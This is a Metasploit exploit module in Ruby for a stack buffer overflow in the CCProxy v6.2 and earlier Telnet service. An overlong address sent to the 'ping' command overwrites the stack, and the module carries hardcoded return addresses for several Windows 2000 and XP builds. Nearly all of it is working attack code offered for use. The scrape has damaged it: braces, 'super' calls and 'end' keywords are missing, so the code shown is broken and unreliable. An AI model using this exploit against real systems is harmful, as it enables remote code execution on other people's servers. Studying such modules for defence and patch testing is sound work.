CCProxy <= v6.2 Telnet Proxy Ping Overflow Exploit (meta)


# $Id$

# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.

require 'msf/core'

module Msf

class Exploits::Windows::Proxy::CCProxy_Telnet_Ping < Msf::Exploit::Remote
  include Exploit::Remote::Tcp

  def initialize(info = {})
      'Name'    => 'CCProxy <= v6.2 Telnet Proxy Ping Overflow',
      'Description'  => %q{
      This module exploits the YoungZSoft CCProxy <= v6.2 suite Telnet service.
        The stack is overwritten when sending an overly long address to the 'ping' command.
      'Author'   => [ 'Patrick Webster <patrick[at]>' ],
      'Arch'    => [ ARCH_X86 ],
      'License' => MSF_LICENSE,
      'Version' => '$Revision$',
      'References' =>
        [ 'BID', '11666 ' ],
        [ 'CVE', '2004-2416' ],
        [ 'MIL', '621' ],
        [ 'OSVDB', '11593' ],
      'Privileged'    => false,
      'DefaultOptions'  =>
        'EXITFUNC'   => 'thread',
      'Payload' =>
          'Space'    => 1012,
          'BadChars'   => "\x00\x07\x08\x0a\x0d",
      'Platform' => ['win'],
      'Targets' =>
      # Patrick – Tested OK 2007/08/19. W2K SP0, W2KSP4, XP SP0, XP SP2 EN.
        'Windows 2000 Pro All – English',
          'Ret'  => 0x75023411, # call esi ws2help.dll
        'Windows 2000 Pro All – Italian',
          'Ret'  => 0x74fd2b81, # call esi ws2help.dll
        'Windows 2000 Pro All – French',
          'Ret'  => 0x74fa2b22, # call esi ws2help.dll
        'Windows XP SP0/1 – English',
          'Ret'  => 0x71aa1a97, # call esi ws2help.dll
        'Windows XP SP2 – English',
          'Ret'  => 0x71aa1b22, # call esi ws2help.dll
      'DisclosureDate' => 'Nov 11 2004'))

      ], self.class)

  def autofilter

  def check
    banner = sock.get_once(-1,3)

    if (banner =~ /CCProxy Telnet Service Ready/)
      return Exploit::CheckCode::Appears
    return Exploit::CheckCode::Safe

  def exploit
    sploit = "p " + payload.encoded + [target['Ret']].pack('V') + make_nops(7)
    sock.put(sploit + "\r\n")



# [2007-09-03]

